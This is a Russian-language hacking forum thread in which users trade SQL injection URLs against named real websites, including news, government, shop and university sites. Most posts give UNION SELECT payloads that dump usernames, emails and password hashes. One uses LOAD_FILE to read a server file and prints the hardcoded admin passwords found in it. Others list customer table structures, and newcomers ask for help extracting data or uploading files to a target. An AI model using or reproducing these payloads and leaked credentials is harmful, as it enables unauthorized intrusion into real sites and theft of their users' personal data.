SQL Инъекции

Acte.org - PR 6

получаем данные.. токо хз откуда они )

еще... пассы

ну и картон собственно )

кто сможет чтот с этим сайтом сделать пишите в личку )

 

[ http://www.agr.state.il.us ] PR=6

SQL inj:

Админка:

(с админкой загон... авторизацию не нашёл..)

 

http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-1+union+select+1,LOAD_FILE(0x2f686f6d652f736974652f68617264766973696f6e2e72752f7765622f61646d696e2f61646d696e2e70687033),3/*
В сорсах смотрим и вуля... Пароль хранится не в бд

PHP:

<?php
if ($db=='news'){
        if ($author =='Reg' && $password=='regulator'){include "news/formindexstart.php";}
        if ($author=='Digit' && $password=='mityap'){include "news/formindexstart.php";}
        if ($author=='Nitro' && $password=='asdbnmiop'){include "news/formindexstart.php";}
        if ($author=='George' && $password=='dolin'){include "news/formindexstart.php";}
}
elseif ($db=='files'){
        if ($author=='Reg' && $password=='regulator'){include "files/formindex.php3";}
        if ($author=='Gigit' && $password=='mityap'){include "files/formindex.php3";}
        if ($author=='Nitro' && $password=='asdbnmiop'){include "files/formindex.php3";}
}
?> 

 

Churchilltrust.com.au - PR 5

увы 4.

хехе угадал )

а вот тут не угадал... заеб подбирать(

 

TARGET: http://mnogobd.ru/

USER(): a1mnogobd_art@localhost
DATABASE(): a1mnogobd_mnog
VERSION(): 5.0.37-standard-log


SQL-inj:

Code:

http://www.mnogobd.ru/info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,  13,14/*

Раскрытые пути

Code:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/a1mnogobd/domains/mnogobd.ru/public_html/info.php on line 6

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/a1mnogobd/domains/mnogobd.ru/public_html/info.php on line 10

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/a1mnogobd/domains/mnogobd.ru/public_html/info.php on line 14

Вот как-то так)

 

Code:

http://www.xgamestation.com/view_product.php?id=-1%20UNION%20ALL%20SELECT%201,concat_ws(0x3a,username,user_email,user_password),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8%20from%20phpbb_users%20Limit%204500,1--

Code:

http://www.gamershood.com/game.php?id=-1+UNION+SELECT+1,2,concat_ws(0x3a,username,email,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+user+limit+20000,1--

Code:

http://babaguga.com/showcat.php?cat_id=-99999/**/union/**/select/**/0,concat(user_name,0x3a,password),2/**/from/**/std_users/*

 

Раскрутил:
Актуальные Таблицы и колонки:

Code:

-bag
--cena
--count
--id_zakaz
--summa
-client
--email
--tel
--cur_data
--id_client
--dop_info
--adress
-region
--name_region
-rubrika
--name_rubrika
-t_news
--small_msg
--title_news
--k_slov_news
--zag_news
--msg
-tovar
--stoimost
--name
--region
--vipusk
--prinadl
--img
--new
--opisanie
--top
--title_tov
--k_slov_tov
--excluziv
--sbornik

Code:

http://www.mnogobd.ru/info.php?id=-1+union+select+1,concat_ws(0x3a,email,id_client),3,4,5,6,7,8,9,10,11,12,13,14+From+client

 

http://opac.iuav.it/sbda/main.php?section=-200+union+select+1,2,3,4,5,6,7,8/*
version() - 5.0.37-community
database() - WebMenu
user() - [email protected]
Admin, sbda_authors - нашол 2 таблици подходящие . sbda_authors тут подобрал только логин-admin. пароль не смог может ктото докопает)

 

Я новичок! Скажите плиз эт уязвимость?
http://www.ac-psych.org/?id=1'/*
Если да то какое название поля?
Заранее спасибо!

 

http://www.ac-psych.org/?id=-1+union+select+version()/*

http://www.ac-psych.org/?id=-1+union+select+table_name+from+information_schema.tables+limit+1,1/*

 

masterBlack, не пиши пож. большими буквами.

http://www.ac-psych.org/?id=1%20union%20select%20table_name%20FROM%20INFORMATION_SCHEMA.TABLES%20limit%2017,1

меняй N - limit N,1 и см. таблицы. Ознакомься с этой темой (FAQ):
https://forum.antichat.ru/threadnav43966-1-10.html

 

Спасибо!

 

Народ нашел дыру
http://БЛАБЛА/forprint.php?id=-1+union+select+1,2,3,version(),5,6,7,8/*
versia 5.*.*
http://БЛАБЛА/forprint.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+information_schema.tables+limit+1,1/*
нашел нужные таблицы
KEY_COLUMN_USAGE
neo_groups
client_info
Теперь как узнать что в них? напишите плиз готовый вариант, то сколько по faq не пытался ни хрена не получается
заранее спс

Вот мой вариант
http://БЛАБЛА/forprint.php?id=-1+union+select+1,2,3,column_name,5,6,7,8+from+information.schema.columns+where+table_name=%27client_info%27/*
Но после этого ни чего не выводит мб я чет не так делаю, хз , жду ващй помощи )

 

А я ради безопасности тут написал
во спс помогли
Где можно побольше узнать об этом concat_ws(0x3a, я чет ваще не понимаю что это и откуда

в hex, char... как это сделать? )

в гугл не посылать )

 

Привет всем!Нужна помощь!!!
Кто может помочь найти уязвимость в этом сайте http://kunik.no-ip.com/wordpress версия движка wordpress-2.5 помочь залить этот файл с сайта http://rapidshare.com/files/128670416/user.php.html на этот сайт http://kunik.no-ip.com/
Зарание спосибо!!!

 

a-shop.ru
_http://www.a-shop.ru/articles.php?aid=-54'+union+select+1,concat_ws(0x3a,username,password),3,4+from+administrators/*

 

audit.by

 

http://www.audit.by/new/index.php?id=10&spr=1+union+select+1,2,version()/*
4 версия =(
----
http://www.audit.by/new/index.php?id=10&spr=1+union+select+1,2,3+from+news/*

 

pr=6
www.bangkokpost.com

Code:

http://www.bangkokpost.com/breaking_news/breakingnews.php?id=-128097+union+select+1,2,3,4,5,6,name,8,9,email,11,12,13,14,15+from+users--

sify.com

Code:

http://sify.com/sports/football/fullstory.php?id=-14704106+union+select+1122,2222,3333,4444,version(),6666,7777,8888,999,1000,1100,1200,1300,1400,1500,1600,1700,1800--

pr=5
www.panoramablick.com

Code:

http://www.panoramablick.com/service4free.php?kat_id=3364&nav_id=-3364+union+select+1,2,3,4--&lang=en&action=showkat

 

www.creeknationcasino.com

SQL inj:

Админка: